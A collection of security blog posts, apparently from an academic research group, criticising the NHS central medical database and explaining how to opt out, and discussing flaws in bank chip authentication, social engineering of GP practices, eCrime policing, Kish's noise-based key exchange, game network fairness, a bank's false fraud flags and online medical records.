Opting out of the NHS Database

The front page lead in today’s Guardian explains how personal medical data (including details of mental illness, abortions, pregnancy, drug taking, alcohol abuse, fitting of colostomy bags etc etc) are to be uploaded to a central NHS database regardless of patients’ wishes.

The Government claims that especially sensitive data can be put into a “sealed envelope” which would not ordinarily be available… except that NHS staff will be able to “break the seal” under some circumstances; the police and Government agencies will be able to look at the whole record — and besides, this part of the database software doesn’t even exist yet, and so the system will be running without it for some time.

The Guardian has more details in the article: From cradle to grave, your files available to a cast of thousands, some comments from doctors and other health professionals: A national database is not essential and a leading article: Spine-chilling.

The Guardian give details on how to opt-out of data sharing: What can patients do? using suggestions for a letter from our own Ross Anderson who has worked on medical privacy for over a decade (see his links to relevant research).

If you are concerned (and in my view, you really should be — once your data is uploaded it will be pretty much public forever), then discuss it with your GP and write off to the Department of Health [*]. The Guardian gives some suitable text, or you could use the opt-out letter that FIPR developed last year (PDF or Word versions available).

[*] See Ross’s comment on this article first!

Yet another insecure banking system

The banks are thinking about introducing a new anti-phising meaure called the ‘chip authentication protocol’. How it works is that each customer gets a device like a pocket calculator in which you put your ‘chip and PIN’ (EMV) card, enter your PIN (the same PIN you use for ATMs), and it will display a one-time authentication code that you’ll use to log on to your electronic banking service, instead of the current password and security question. The code will be computed by the card, which will encrypt a transaction counter using the EMV authentication cryptogram generation key – the same key the EMV protocol uses to generate a MAC on an ATM or store transaction. The use model is that everyone will have a CAP calculator; you’ll usually use your own, but can lend it to a friend if he’s caught short.

I can see several problems with this. First, when your wallet gets nicked the thief will be able to read your PIN digits from the calculator – they will be the dirty and worn keys. If you just use one bank card, then the thief’s chance of guessing your PIN in 3 tries has just come down from about 1 in 3000 to about 1 in 10. Second, when you use your card in a Mafia-owned shop (or in a shop whose terminals have been quietly reprogrammed) the bad guys have everything they need to loot your account. Not only that – they can compute a series of CAP codes to give them access in the future, and use your account for wicked purposes such as money laundering. Oh, and once all UK banks (not just Coutts) use one-time passwords, the phishermen will just rewrite their scripts to do real-time man-in-the-middle attacks.

I suspect the idea of trying to have a uniform UK solution to the phishing problem may be misguided. Bankers are herd animals by nature, but herding is a maladaptive response to phishing and other automated attacks. It might be better to go to the other extreme, and have a different interface for each customer. Life would be harder for the phishermen, for example, if I never got an email from the NatWest but only ever from Bernie Smith my ‘relationship banker’ – and if I were clearly instructed that if anyone other than Bernie ever emailed me from the NatWest then it was a scam. But I don’t expect that the banks will start to act rationally on security until the liability issues get fixed.

How to hack your GP's computer system

It’s easy – you just send them a letter on what appears to be Department of Health notepaper telling them to go to a URL, download a program, load it on their practice system, and run it. The program does something with the database, extracts some information and sends it back to whoever wrote it.

I have written to one of the medical magazines explaining why this is not a good way to do things. Doctors would never dream of injecting some random potion they received through the post into their patients – they’d insist on peer review, licensing, and a trustworthy supply chain. So who reviewed the specification of this software? Who evaluated the implementation? Who accepts liability if it corrupts the patient database, leading to a fatal accident?

Were it not for the Computer Misuse Act, I would email 100 practices at random with a version of the above letter, telling them to run my software – which would simply report back who ran it. From talking to a handful of doctors I reckon most of them would fall for it.

No doubt the bad guys will start doing this sort of thing. Eventually doctors, lawyers and everyone else will learn the simple lesson ‘don’t install software’. Until then, this will be the smart way to help yourself to the juicy, meaty bits of a target organisation’s data. So what will we call it? Philleting?

Mainstreaming eCrime

Back in February I wrote about how the establishment of the Serious Organised Crime Agency (SOCA) was likely to lead to situation in which “level 2” eCrime could end up failing to be investigated. “Level 1” crime is “local” to a single police force, “level 3” crime is “serious” or “organised” and requires tackling at a national or international level — and “level 2” crime is what’s in-between: occurring across the borders of local police forces, but not serious or organised enough to be SOCA’s problem.

Over the past few weeks I’ve been at a Metropolitan Police “Knowledge Forum” and at a Parliament and Internet Conference. There I’ve learnt about how the police (at ACPO level, not just the Met) are intending to tackle eCrime in the future.

The jargon for the new policy is “mainstreaming” — by which is meant that the emphasis will move away from tackling “eCrime” as something special, and regular officers will deal with it just as “Crime”.

In particular when there are “e” aspects to a normal crime, such as a murder, then this will be dealt with as a matter of course, rather than be treated as something exotic. With the majority of homes containing computers, and with the ubiquity of email, instant messaging and social network sites, this can only be seen as a sensible adaptation to society as it is today. After all, the police don’t automatically call in specialist officers just because the murder victim owns a car.

Although there is a commitment to maintain existing centres of excellence, specialist units with expertise in computer forensics, units that tackle “grooming” by paedophiles, and undercover police who deal with obscene publications, I am less sanguine about the impact of this policy when it comes to crimes that rely upon the Internet to be committed. These types of crime can be highly automated, operated from a distance, hard to track down and obtain evidence about, and can be lucrative even if only small amounts are stolen from each victim.

I believe there is still some doubt that Internet-based crimes will be investigated, not just from lack of resources (always a problem, as anyone who has been burgled or had a car window smashed will know), but because it’s no-ones task and appears on no-one’s checklist for meeting Government targets (there’s still no central counting of eCrime occurring).

Mainstreaming is proposed to have some sensible adjuncts in that police forces will be encouraged to pool intelligence about eCrime (to build up a picture of the full impact of the crime and to link investigators together), and some sort of national coordination centre is planned to partially replace the NHTCU. However, although this may sometimes mean that an investigation can be mounted into an eBay fraudster in Kent who rips off people in Lancashire and Dorset — I am not sure that the same will be true if the victims are in Louisiana and Delaware — or if the fraudster lives in a suburb of Bucharest.

The details of what “mainstreaming” will mean for eCrime are still being worked out, so it’s not possible to be sure what it will mean exactly. It sounds like it will be an improvement on the current arrangements, but I’m pessimistic about it really getting to grips with many of the bad things that continue to happen on the Internet.

New website on NHS IT problems

At http://nhs-it.info, colleagues and I have collected material on the NHS National Programme for IT, which shows all the classic symptoms of a large project failure in the making. If it goes belly-up, it could be the largest IT disaster ever, and could have grave consequences for healthcare in Britain. With 22 other computer science professors, I wrote to the Health Select Committee urging them to review the project. The Government is dragging its feet, and things seem to be going from bad to worse.

Kish's "totally secure" system is insecure

Recently, Kish proposed a “totally secure communication system” that uses only resistors, wires and Johnson noise. His paper—“Totally Secure Classical Communication Utilizing Johnson (-like) Noise and Kirchoff’s Law”—was published on Physics Letters (March 2006).

The above paper had been featured in Science magazine (Vol. 309), reported in News articles (Wired news, Physorg.com) and discussed in several weblogs (Schneier on security, Slashdot). The initial sensation created was that Quantum communication could now be replaced by a much cheaper means. But not quite so …

This paper—to appear in IEE Information Security—shows that the design of Kish’s system is fundamentally flawed. The theoretical model, which underpins Kish’s system, implicitly assumes thermal equilibrium throughout the communication channel. This assumption, however, is invalid in real communication systems.

Kish used a single symbol ‘T’ to denote the channel temperature throughout his analysis. This, however, disregards the fact that any real communication system has to span a distance and endure different conditions. A slight temperature difference between the two communicating ends will lead to security failure—allowing an eavesdropper to uncover the secret bits easily (more details are in the paper).

As a countermeasure, it might be possible to adjust the temperature difference at two ends to be as small as possible—for example, by using external thermal noise generators. However, this gives no security guarantee. Instead of requiring a fast computer, an eavesdropper now merely needs a voltage meter that is more accurate than the equipments used by Alice and Bob.

In addition, the transmission line must maintain the same temperature (and noise bandwidth) as the two ends to ensure “thermal equilibrium”, which is clearly impossible. Kish avoids this problem by assuming zero resistance on the transmission line in his paper. Since the problem with the finite resistance on the transmission line had been reported before, I will not discuss it further here.

To sum up, the mistake in Kish’s paper is that the author wrongly grafted assumptions from one subject into another. In circuit analysis, it is common practice to assume the same room temperate and ignore wire resistance in order to simplify the calculation; the resultant discrepancy is usually well within the tolerable range. However, the design of a secure communication is very different, as a tiny discrepancy could severely compromise the system security. Basing security upon invalid assumptions is a fundamental flaw in the design of Kish’s system.

Boom! Headshot!

It’s about time I confessed to playing online tactical shooters. These are warfare-themed multiplayer games that pit two teams of 16 — 32 players against each other, to capture territory and score points. These things can be great fun if you are so inclined, but what’s more, they’re big money these days. A big online shooter like Counterstrike might sell maybe 2 million copies, and tactical shooter Battlefield 2 has almost 500,000 accounts on the main roster. The modern blockbuster game grosses several times more than a blockbuster movie!

In this post, I consider a vital problem for game designers — maintaining the quality of experience for the casual gamer — and it turns out this is somewhat a security problem. People gravitate towards these games because the thrill of competition against real humans (instead of AI) is tangible, but this is a double-edged sword. Put simply, the enemy of the casual gamer is the gross unfairness in online play. But why do these games feel so unfair? Why do you shake the hand of a squash player, or clap your footie opponent on his back after losing good game, but walk away from a loss in a tactical shooter angry, frustrated and maybe even abusive? Is it just the nature of the clientele?

This post introduces a draft paper I’ve written called “Boom! Headshot! (Building Neo-Tactics on Network-Level Anomalies in Online Tactical First-Person Shooters)”, (named after this movie clip”), which may hold some of the answers to understanding why there is so much perceived unfairness. If the paper is a little dense, try the accompanying presentation instead.

Do you want to know more? If so, read on…
Continue reading Boom! Headshot!

Closing in on suspicious transactions

After almost 3 years of problem-free banking in the UK I recently received the following letter from HSBC’s “Accounts Review Team”. It advised me that the HSBC group no longer wished to have me as a customer and that I had 30 days to move my banking to an establishment in no way connected to HSBC, before they would close my account. Confident that I had not indulged in any illegal activity recently, and concerned about their reasons for taking such action, I attempted several times to phone the number given in the letter, unsuccessfully reaching a “we are busy, please try again” recording each time. Visiting my home branch was not much more helpful as they claimed that the information had not been shared with them. I was advised to make a written complaint and was told that the branch had already referred the matter, as a number of customers had come in with similar letters.

After two written complaints and a phone call to customer services, a member of the “Team” finally contacted me. She enquired about a single international deposit into my account, which I then explained to be my study grant for the coming year. Upon this explanation I was told that the bank would not close my account, and I was given a vague explanation of them not expecting students to get large deposits. I found this strange, since it had not been a problem in previous years, and even stranger since my deposit had cleared into my account two days after the letter was sent. In terms of recent “suspicious” transactions, this left only two recent international deposits: one from my parents overseas and one from my savings, neither of which could be classified as large. I’m not an expert on complex behavioural analysis networks and fraud detection within banking systems, but would expect that study grants and family support are not unexpected for students? Moreover, rather than this being an isolated incident, it would seem that HSBC’s “account review” affected a number of people within our student community, some of whom might choose not to question the decision and may be left without bank accounts. This should raise questions about the effectiveness of their fraud detection system, or possibly a flawed behaviour model for a specific demographic.

My account is now restored, but I have still had no satisfactory explanation as to why the decision was made to close my account, nor do I know how this sorry affair will affect my future banking and credit rating. Would an attempt to transfer my account have caused HSBC’s negative opinion of me to spread to other institutions? A security mechanism that yields false positives or recommends a disproportionate reaction, e.g. closing an account based on a single unexpected transaction, should be seen as somewhat flawed. The end result is that the system runs on a guilty until proven innocent premise, with the onus for correcting marginal calls placed on the customer. Ultimately the bank will claim that these mechanisms are designed to protect the customer, but in the end randomly threatening to close my account does not make me feel any safer.

Random isn't always useful

It’s common to think of random numbers as being an essential building block in security systems. Cryptographic session keys are chosen at random, then shared with the remote party. Security protocols use “nonces” for “freshness”. In addition, randomness can slow down information gathering attacks, although here they are seldom a panacea. However, as George Danezis and I recently explained in “Route Fingerprinting in Anonymous Communications” randomness can lead to uniqueness — exactly the property you don’t want in an anonymity system.
Continue reading Random isn't always useful

Which services should remain offline?

Yesterday I gave a talk on confidentiality at the EMIS annual conference. I gained yet more insights into Britain’s disaster-prone health computerisation project. Why, for example, will this cost eleven figures, when EMIS writes the software used by 60% of England’s GPs to manage their practices with an annual development budget of only 25m?

On the consent front, it turns out that patients who exercise even the mildest form of opt-out from the national database (having their addresses stop-noted, which is the equivalent of going ex-directory — designed for celebs and people in witness protection) will not be able to use many of the swish new features we’re promised, such as automatic repeat prescriptions. There are concerns that providing a degraded health service to people who tick the privacy box might undermine the validity of consent to information sharing.

On the confidentiality front, people are starting to wrestle with the implications of allowing patients online access ot their records. Vulnerable patients — for example, under-age girls who have had pregancy terminations without telling their parents — could be at risk if they can access sensitive data online. They may be coerced into accessing it, or their passwords may become known to friends and family. So there’s talk of a two-tier online record — in effect introducing multilevel security into record access. Patients would be asked whether they wanted some, all, or none of their records to be available to them online. I don’t think the Department of Health understands the difficulties of multilevel security. I can’t help wondering whether online patient access is needed at all. Very few patients ever exercise their right to view and get a copy of their records; making all records available online seems more and more like a political gimmick to get people to accept the agenda of central data collection.

We don’t seem to have good ways of deciding what services should be kept offline. There’s been much debate about elections, and here’s an interesting case from healthcare. What else will come up, and are there any general principles we’re missing?